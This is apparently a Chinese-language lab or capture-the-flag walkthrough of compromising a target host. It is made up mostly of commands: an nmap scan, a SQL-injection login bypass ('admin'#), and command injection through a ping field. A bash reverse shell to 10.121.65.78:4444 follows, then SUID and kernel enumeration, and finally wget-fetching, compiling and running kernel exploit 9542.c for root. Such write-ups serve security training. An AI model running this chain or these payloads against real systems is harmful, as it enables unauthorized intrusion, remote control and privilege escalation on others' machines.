0x01信息收集

nmap -sV -O 10.121.65.83

0x02 万能密码&&命令执行

访问80端口(经测试 443端口并没有办法访问)

登录框尝试弱口令和sql注入 发现存在万能密码

admin'#

存在一个ping命令，尝试通过管道符看是否会执行命令

127.0.0.0|id

存在命令执行漏洞，那么反弹一个shell即可

127.0.0.1|bash -i >& /dev/tcp/10.121.65.78/4444 0>&1

0x03 权限提升

通过suid尝试提权

find / -perm -u=s -type f 2>/dev/null 查找有权限的文件

发现并没有可以利用的地方

接着查看操作系统版本号

查看linux系统版本信息命令：lsb_release -a

查看内核版本 uname -a

发现是CenOS 4.5 内核为 linux 2.6.9

攻击机上开启web服务

python2 -m SimpleHTTPServer 80

然后在靶机上通过wget下载9542.c，在靶机上进行编译(因为这个脚本只支持x86，在64上无法编译。)

cd /tmp

wget 10.121.65.78/9542.c

这里要到tmp目录下才能下载，否则其他目录都没办法写入

gcc 9542.c -o 9542

./9542